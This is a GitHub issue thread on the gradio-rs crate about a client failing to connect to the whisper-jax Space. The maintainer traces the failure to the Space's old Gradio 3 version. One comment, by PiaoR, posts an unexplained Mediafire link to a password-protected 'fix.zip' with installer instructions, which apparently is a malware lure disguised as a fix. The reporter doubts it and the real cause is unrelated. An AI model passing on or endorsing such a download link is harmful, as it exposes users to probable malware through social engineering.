### ISSUE TITLE
Could not open a client  on sanchit-gandhi/whisper-jax space

### ISSUE THREAD

**Issue by denizsincar29** [JacobLinCool/gradio-rs#5]
Hello, Anyone tried to create a sync client with sanchit-gandhi/whisper-jax space?
```rust
let client = Client::new_sync("sanchit-gandhi/whisper-jax", , ClientOptions::default()).unwrap();
```

error:
```
thread 'main' panicked at src/main.rs:11:89:                                                                            
called `Result::unwrap()` on an `Err` value: error decoding response body                                               
Caused by:                                                                                                              
    missing field `component_class_id` at line 1 column 203                                                             
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace                                           
error: process didn't exit successfully: `target\debug\voice_recognition.exe` (exit code: 101)

```

**Comment by denizsincar29** [comment]
Upd: didn't try async, just sync. But i don't think there's a difference.

**Comment by denizsincar29** [comment]
EDT: tried python gradio client and website, all good. gr list sanchit-gandhi/whisper-jax also doesn't work.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by denizsincar29** [comment]
What's the purpose of this?

**Comment by denizsincar29** [comment]
Other spaces are working, just whisper jax is not. @PiaoR I  very doubt that this is the fix. What does it do? How does it fix?

**Comment by JacobLinCool** [comment]
It seems that sanchit-gandhi/whisper-jax is still using Gradio 3 (3.50.2) https://sanchit-gandhi-whisper-jax.hf.space/config
I don't want to support old Gradio versions because their schema is very confusing. For example, `api_name` can be string, null or bool (what does bool mean here??)

**Comment by denizsincar29** [comment]
OMG @JacobLinCool than we could make a good error that this gradio version not supported.

**Comment by JacobLinCool** [comment]
Yes, definitely. I'll also add a notice in the README.
